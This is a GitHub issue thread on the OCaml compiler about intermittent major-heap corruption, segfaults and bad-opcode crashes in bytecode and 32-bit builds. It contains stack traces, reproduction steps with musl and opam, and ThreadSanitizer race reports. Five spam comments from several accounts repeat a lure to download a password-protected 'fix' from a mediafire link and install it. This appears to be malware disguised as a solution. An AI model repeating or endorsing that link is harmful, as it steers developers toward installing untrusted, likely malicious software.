### ISSUE TITLE
Crash or major heap corruption in bytecode mode

### ISSUE THREAD

**Issue by jmid** [ocaml/ocaml#13402]
We're observing a major heap corruption or crash in 32-bit mode.
I'm able to trigger it relatively consistently with both `5.2.0` and `trunk` on x86_86 under GitHub actions.
The kicker is, so far I've not been able to do so locally, in Docker, under `rr`, or on a 32-bit RPi.

The test in question is this one: https://github.com/ocaml-multicore/multicoretests/blob/domain-dls-32-bit-focus/src/domain/stm_tests_dls.ml
It performs a sequence of random `Domain.DLS.set`s (or `get`s) which run in a child domain (there are no evil parallel domains). Crashes can be triggered either with only `set`s (or `get`s), so it does not seem closely tied to these per se.

I've earlier done a bisection, establishing that this started triggering on bdd8d96 - `Make the GC compact again` from #12193.

It seems easiest to trigger under the debug runtime. Out of 200 repetitions here https://github.com/ocaml-multicore/multicoretests/actions/runs/10297760451/job/28501499241 there's 21 failures distributed as
- 13 cases of major heap verification failure
  ```
  file runtime/shared_heap.c; line 784 ### Assertion failed: Has_status_val(v, caml_global_heap_state.UNMARKED)
  /usr/bin/bash: line 1: 63840 Illegal instruction     (core dumped)
  ```
- 4 cases of OCaml heap value corruption showing up as invalid counterexamples (which the generator did not produce)
  ```
  Test STM Domain.DLS test sequential errored on (25 shrink steps):
     Set (-133652508, -134770910)
  ```
- 3 cases of a clean `Segmentation fault (core dumped)`
- 1 case of `Fatal error: bad opcode (5971072b)  Aborted (core dumped)`

IIUC, the first one indicates that a reachable major heap value is either `MARKED` or `GARBAGE` after a completed mark-sweep cycle (the marked bits are recycled each cycle to avoid an additional heap traversal).

By adjusting the `space_overhead` parameter from the default `o=120` to `o=20` it errs 45 out of 200 iterations, a clear increase with more major GC activity.

Using tmate I've been able to log in to the GitHub actions machine and obtain two stack traces.
(I'm a bit hesitant about doing this as we rely on and benefit from the GitHub actions runners)
<details>
  <summary>Here's one from an assertion failure:</summary>

```
Thread 4 (Thread 0xf03ffac0 (LWP 172957)):
#0  0xf1a6c579 in __kernel_vsyscall ()
#1  0xf1683243 in ?? () from /lib/i386-linux-gnu/libc.so.6
#2  0xf168a06a in pthread_mutex_lock () from /lib/i386-linux-gnu/libc.so.6
#3  0x5922ab80 in caml_plat_lock_blocking (m=0x5a9df4c0) at runtime/caml/platform.h:457
#4  backup_thread_func (v=<optimized out>) at runtime/domain.c:1076
#5  0xf1686c01 in ?? () from /lib/i386-linux-gnu/libc.so.6
#6  0xf172372c in ?? () from /lib/i386-linux-gnu/libc.so.6

Thread 3 (Thread 0xf1880740 (LWP 171712)):
#0  0xf1a6c579 in __kernel_vsyscall ()
#1  0xf1715336 in ?? () from /lib/i386-linux-gnu/libc.so.6
#2  0xf1682e81 in ?? () from /lib/i386-linux-gnu/libc.so.6
#3  0xf1686079 in pthread_cond_wait () from /lib/i386-linux-gnu/libc.so.6
#4  0x592572d1 in sync_condvar_wait (m=0x5a9e3920, c=0x5a9e1620) at runtime/sync_posix.h:116
#5  caml_ml_condition_wait (wcond=<optimized out>, wmut=<optimized out>) at runtime/sync.c:172            ##### In a C call
#6  0x5925dce2 in caml_interprete (prog=<optimized out>, prog_size=<optimized out>) at runtime/interp.c:1047
#7  0x59261052 in caml_startup_code_exn (pooling=0, argv=0xffdf2e24, section_table_size=3683, section_table=0x59292020 <caml_sections> "\204\225\246\276", data_size=21404, data=0x59292ea0 <caml_data> "\204\225\246\276", code_size=528104, code=0x59298240 <caml_code>) at runtime/startup_byt.c:655
#8  caml_startup_code_exn (code=0x59298240 <caml_code>, code_size=528104, data=0x59292ea0 <caml_data> "\204\225\246\276", data_size=21404, section_table=0x59292020 <caml_sections> "\204\225\246\276", section_table_size=3683, pooling=0, argv=0xffdf2e24) at runtime/startup_byt.c:588
#9  0x59261101 in caml_startup_code (code=0x59298240 <caml_code>, code_size=528104, data=0x59292ea0 <caml_data> "\204\225\246\276", data_size=21404, section_table=0x59292020 <caml_sections> "\204\225\246\276", section_table_size=3683, pooling=0, argv=0xffdf2e24) at runtime/startup_byt.c:669
#10 0x592120b4 in main (argc=4, argv=0xffdf2e24) at camlprim.c:25901

Thread 2 (Thread 0xee0f6ac0 (LWP 172956)):
#0  0x592512cc in caml_verify_root (state=0xf10ae180, v=-245978988, p=0xf11f7410) at runtime/shared_heap.c:759
#1  0x5923013d in caml_scan_stack (f=0x592512c0 <caml_verify_root>, fflags=0, fdata=0xf10ae180, stack=0xf117f010, v_gc_regs=0x0) at runtime/fiber.c:396
#2  0x5924f826 in caml_do_local_roots (f=0x592512c0 <caml_verify_root>, fflags=0, fdata=0xf10ae180, local_roots=0xee0f61ec, current_stack=0xf117f010, v_gc_regs=0x0) at runtime/roots.c:65
#3  0x5924f865 in caml_do_roots (f=0x592512c0 <caml_verify_root>, fflags=0, fdata=0xf10ae180, d=0xf0402620, do_final_val=1) at runtime/roots.c:41
#4  0x5925343e in caml_verify_heap_from_stw (domain=0xf0402620) at runtime/shared_heap.c:804
#5  0x59240c39 in stw_cycle_all_domains (domain=<optimized out>, args=<optimized out>, participating_count=<optimized out>, participating=<optimized out>) at runtime/major_gc.c:1434
#6  0x5922af41 in caml_try_run_on_all_domains_with_spin_work (sync=<optimized out>, handler=<optimized out>, data=<optimized out>, leader_setup=<optimized out>, enter_spin_callback=<optimized out>, enter_spin_data=<optimized out>) at runtime/domain.c:1695
#7  0x5922b10a in caml_try_run_on_all_domains (handler=0x592407c0 <stw_cycle_all_domains>, data=0xee0f5ca8, leader_setup=0x0) at runtime/domain.c:1717
#8  0x5924324e in major_collection_slice (howmuch=<optimized out>, participant_count=participant_count@entry=0, barrier_participants=barrier_participants@entry=0x0, mode=<optimized out>, force_compaction=<optimized out>) at runtime/major_gc.c:1851
#9  0x59243670 in caml_major_collection_slice (howmuch=-1) at runtime/major_gc.c:1869
#10 0x5922a7d8 in caml_poll_gc_work () at runtime/domain.c:1874
#11 0x59254e67 in caml_do_pending_actions_res () at runtime/signals.c:338
#12 0x5924cc9c in caml_alloc_small_dispatch (dom_st=0xf0402620, wosize=2, flags=3, nallocs=1, encoded_alloc_lens=0x0) at runtime/minor_gc.c:896
#13 0x5925f1f9 in caml_interprete (prog=<optimized out>, prog_size=<optimized out>) at runtime/interp.c:788
#14 0x59224cbc in caml_callbackN_exn (closure=<optimized out>, narg=<optimized out>, args=<optimized out>) at runtime/callback.c:131
#15 0x59224faa in caml_callback_exn (arg1=<optimized out>, closure=<optimized out>) at runtime/callback.c:144
#16 caml_callback_res (closure=-243007372, arg=1) at runtime/callback.c:320
#17 0x59229e4a in domain_thread_func (v=<optimized out>) at runtime/domain.c:1244
#18 0xf1686c01 in ?? () from /lib/i386-linux-gnu/libc.so.6
#19 0xf172372c in ?? () from /lib/i386-linux-gnu/libc.so.6

Thread 1 (Thread 0xef3feac0 (LWP 171715)):
#0  caml_failed_assert (expr=0x5926bf18 "Has_status_val(v, caml_global_heap_state.UNMARKED)", file_os=0x5926b995 "runtime/shared_heap.c", line=784) at runtime/misc.c:48
#1  0x59253709 in verify_object (v=-298832060, st=0xf1074c70) at runtime/shared_heap.c:784
#2  caml_verify_heap_from_stw (domain=0x5a9e0120) at runtime/shared_heap.c:807
#3  0x59240c39 in stw_cycle_all_domains (domain=<optimized out>, args=<optimized out>, participating_count=<optimized out>, participating=<optimized out>) at runtime/major_gc.c: 1434
#4  0x5922aa28 in stw_handler (domain=0x5a9e0120) at runtime/domain.c:1486
#5  handle_incoming (s=<optimized out>) at runtime/domain.c:351
#6  0x5922ac9a in caml_handle_incoming_interrupts () at runtime/domain.c:364
#7  backup_thread_func (v=<optimized out>) at runtime/domain.c:1057
#8  0xf1686c01 in ?? () from /lib/i386-linux-gnu/libc.so.6
#9  0xf172372c in ?? () from /lib/i386-linux-gnu/libc.so.6
```

Here it seems
- Thread 4 is a waiting backup thread for the child domain
- Thread 3 is the main thread, paused during a blocked `C_CALL2` to `caml_ml_condition_wait`
- Thread 2 is the child domain triggering a major GC slice on `MAKEBLOCK2`
- Thread 1 is the main backup thread participating in STW
</details>

<details>
  <summary>Here's another one from a clean segfault</summary>

```
Thread 2 (Thread 0xf17feac0 (LWP 122715)):
#0  0xf3f47579 in __kernel_vsyscall ()
#1  0xf3b15336 in ?? () from /lib/i386-linux-gnu/libc.so.6
#2  0xf3a82e81 in ?? () from /lib/i386-linux-gnu/libc.so.6
#3  0xf3a86079 in pthread_cond_wait () from /lib/i386-linux-gnu/libc.so.6
#4  0x648daa9d in caml_plat_wait (cond=0x64d693b4, mut=0x64d6939c) at runtime/platform.c:127
#5  0x648b6c1a in backup_thread_func (v=<optimized out>) at runtime/domain.c:1068
#6  0xf3a86c01 in ?? () from /lib/i386-linux-gnu/libc.so.6
#7  0xf3b2372c in ?? () from /lib/i386-linux-gnu/libc.so.6

Thread 1 (Thread 0xf3d5b740 (LWP 122712)):
#0  0x648ea29f in caml_interprete (prog=<optimized out>, prog_size=<optimized out>) at runtime/interp.c:573
#1  0x648ed052 in caml_startup_code_exn (pooling=0, argv=0xff8ca1e4, section_table_size=3683, section_table=0x6491e020 <caml_sections> "\204\225\246\276", data_size=21404, data=0x6491eea0 <caml_data> "\204\225\246\276", code_size=528104, code=0x64924240 <caml_code>) at runtime/startup_byt.c:655
#2  caml_startup_code_exn (code=0x64924240 <caml_code>, code_size=528104, data=0x6491eea0 <caml_data> "\204\225\246\276", data_size=21404, section_table=0x6491e020 <caml_sections> "\204\225\246\276", section_table_size=3683, pooling=0, argv=0xff8ca1e4) at runtime/startup_byt.c:588
#3  0x648ed101 in caml_startup_code (code=0x64924240 <caml_code>, code_size=528104, data=0x6491eea0 <caml_data> "\204\225\246\276", data_size=21404, section_table=0x6491e020 <caml_sections> "\204\225\246\276", section_table_size=3683, pooling=0, argv=0xff8ca1e4) at runtime/startup_byt.c:669
#4  0x6489e0b4 in main (argc=4, argv=0xff8ca1e4) at camlprim.c:25901
```

This one segfaults on a `RETURN` instruction in `pc = Code_val(accu);`
</details>

Here's a fresh branch reproducing the issue on CI (5.2, 5.3, and 5.4 which is now trunk):
https://github.com/ocaml-multicore/multicoretests/tree/domain-dls-32-bit-share-repro
The workflows do something along these steps, if anyone wants to attempt reproducing locally:
```
# install opam and a switch for the target compiler with ocaml-option-32bit
$ opam install qcheck-core
$ git clone -b domain-dls-32-bit-share-repro https://github.com/ocaml-multicore/multicoretests.git
$ cd multicoretests
$ dune build --profile=debug-runtime src/
$ OCAMLRUNPARAM="o=20,s=4096,v=0,V=1" dune build "@ci" -j1 --no-buffer --display=quiet --cache=disabled --error-reporting=twice --profile=debug-runtime src/
```

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DemiMarie** [comment]
Can you try running this with thread sanitizer?

**Comment by jmid** [comment]
Thanks for the suggestion! I can try it with the native code compiler to see if anything pops up :+1: 
32-bit is bytecode only and `ocaml-option-tsan` has `conflicts:  "ocaml-option-bytecode-only"` (among others) in the opam file. In principle, I think it should be possible to develop a bytecode TSan-mode, but AFAIK nothing has been attempted in that direction. @OlivierNicole

**Comment by DemiMarie** [comment]
@jmid For bytecode it should be sufficient to compile the runtime with TSan, though that will give you C-level backtraces instead of OCaml-level ones.

**Comment by ghost** [comment]
I have not been able to reproduce the issue on a 32-bit PowerPC system under OpenBSD yet (it's been hours). Have you been able to reproduce this on a musl-based Linux system? Maybe it's a glibc/linuxthreads issue. (or a subtle race which is much easier to expose with such a libc)

**Comment by DemiMarie** [comment]
LinuxThreads hasn’t been in use for a long time, replaced by the Native POSIX Thread Library.

**Comment by jmid** [comment]
> For bytecode it should be sufficient to compile the runtime with TSan, though that will give you C-level backtraces instead of OCaml-level ones.

I've spent a bit of time playing getting a TSan mode running in bytecode.
I managed to do so, but the result
- requires an amount of suppressions,
- exhibits a number of TSan warnings along the lines of those that have been addressed in the native code mode, and
- reports some races, but not others.

I then stopped when I realized that TSan is not supported on 32-bit:
  https://github.com/google/sanitizers/wiki/ThreadSanitizerCppManual#supported-platforms
since the bug only shows up in a 32-bit CI workflow.

**Comment by jmid** [comment]
> I have not been able to reproduce the issue on a 32-bit PowerPC system under OpenBSD yet (it's been hours). Have you been able to reproduce this on a musl-based Linux system? Maybe it's a glibc/linuxthreads issue. (or a subtle race which is much easier to expose with such a libc)

Not yet, but I can give it a try.

Note: the bug shows up with the `ocaml-option-32bit`, described as
`"Set OCaml to be compiled in 32-bit mode for 64-bit Linux and OS X hosts"` in [the opam-file](https://github.com/ocaml/opam-repository/blob/master/packages/ocaml-option-32bit/ocaml-option-32bit.1/opam)  which means [a Linux configuration with `gcc -m32`](https://github.com/ocaml/opam-repository/blob/master/packages/ocaml-variants/ocaml-variants.5.2.0%2Boptions/opam#L97), so technically this is using "multiarch mode" to test that 32bit executables compile and run on a 64-bit (Intel/Amd) machine.
I'll see if I have luck reproducing on an Intel-based macOS, which should also support `ocaml-option-32bit`.

I still suspect this is a GC-bug:
- as mentioned above, the bisection points to the compaction PR
- experiments reveal that this is sensitive to the distribution of the symbolic `cmd list`s that the test executes: if these are shorter - or if consistently long, it no longer triggers. This makes me suspect the GC interaction of the `cmd list` from the parent, but used in the child domain.

**Comment by DemiMarie** [comment]
Can you build the runtime with undefined behavior sanitizer in a mode where it detects integer overflows, underflows, wraparound, and truncation?

**Comment by jmid** [comment]
> Have you been able to reproduce this on a musl-based Linux system?

The `musl` keyword was indeed the magic spell to get this to reproduce locally @dustanddreams!

Interestingly, I've now found that this is not restricted to 32-bit but will also crash a bytecode build with musl (or very rarely: a bytecode build with glibc).

On a 64-bit Debian/Ubuntu-family system:
```
$ sudo apt-get install musl-tools

$ opam switch create . --empty
$ ./configure "CC=musl-gcc" "CFLAGS=-Os" "ASPP=musl-gcc -c" \
 --disable-warn-error --disable-stdlib-manpages --disable-ocamltest --disable-ocamldoc \
 --disable-native-compiler --prefix=$(opam var prefix)
$ make -j16
$ opam install . --assume-built

# and then as above (for completeness):
$ opam install qcheck-core
$ git clone -b domain-dls-32-bit-share-repro https://github.com/ocaml-multicore/multicoretests.git
$ cd multicoretests
$ dune build --profile=debug-runtime src/
$ OCAMLRUNPARAM="o=20,s=4096,v=0,V=1" dune build "@ci" -j1 --no-buffer --display=quiet --cache=disabled --error-reporting=twice --profile=debug-runtime src/
```


One does not need the debug-runtime and heap verification to trigger it:
```
$ OCAMLRUNPARAM="o=20,s=4096" dune build "@ci" -j1 --no-buffer --display=quiet --cache=disabled --error-reporting=twice src/
Starting 1-th run
random seed: 216909046
generated error fail pass / total     time test name
[ ]   77    0    0   77 / 1000     0.8s STM Domain.DLS test sequential (collecting)/usr/bin/bash: line 1: 219885 Segmentation fault      (core dumped) ./focusedtest.exe -v

[...]
```

**Comment by dustanddreams** [comment]
Which version of `opam` are you using? I'm trying to install a compiler built against musl following your instructions, but the `opam install . --asume-built` step fails with:
```
Fatal error: Undefined boolean filter value: arch != "arm64"
```

**Comment by jmid** [comment]
I'm on opam.2.2.0

**Comment by dustanddreams** [comment]
Ah, I was stuck with 2.1.2. Works much better with 2.2.1 indeed.

**Comment by ghost** [comment]
For what it's worth (and it's probably not very useful at this point).

With an OCaml runtime built with TSan, running your test yields different reported races.

- in bytecode, these are
```
SUMMARY: ThreadSanitizer: data race runtime/major_gc.c:1022 in do_some_marking
SUMMARY: ThreadSanitizer: data race runtime/major_gc.c:1204 in caml_darken
SUMMARY: ThreadSanitizer: data race runtime/major_gc.c:850 in mark_stack_push_block
SUMMARY: ThreadSanitizer: data race runtime/major_gc.c:863 in mark_stack_push_block
SUMMARY: ThreadSanitizer: data race runtime/minor_gc.c:216 in try_update_object_header
SUMMARY: ThreadSanitizer: data race runtime/minor_gc.c:261 in oldify_one
SUMMARY: ThreadSanitizer: data race runtime/minor_gc.c:303 in oldify_one
SUMMARY: ThreadSanitizer: data race runtime/minor_gc.c:333 in oldify_one
SUMMARY: ThreadSanitizer: data race runtime/shared_heap.c:1335 in verify_pool
SUMMARY: ThreadSanitizer: data race runtime/shared_heap.c:1353 in verify_large
SUMMARY: ThreadSanitizer: data race runtime/shared_heap.c:549 in large_alloc_sweep
```
- in native code, they are
```
SUMMARY: ThreadSanitizer: data race runtime/array.c:258 in caml_array_make
SUMMARY: ThreadSanitizer: data race runtime/major_gc.c:1022 in do_some_marking
SUMMARY: ThreadSanitizer: data race runtime/major_gc.c:1204 in caml_darken
SUMMARY: ThreadSanitizer: data race runtime/major_gc.c:850 in mark_stack_push_block
SUMMARY: ThreadSanitizer: data race runtime/minor_gc.c:216 in try_update_object_header
SUMMARY: ThreadSanitizer: data race runtime/minor_gc.c:261 in oldify_one
SUMMARY: ThreadSanitizer: data race runtime/minor_gc.c:303 in oldify_one
SUMMARY: ThreadSanitizer: data race runtime/minor_gc.c:333 in oldify_one
SUMMARY: ThreadSanitizer: data race runtime/shared_heap.c:1335 in verify_pool
```

I have not looked yet at whether they are false positives or real issues, but they look scarier in bytecode mode.
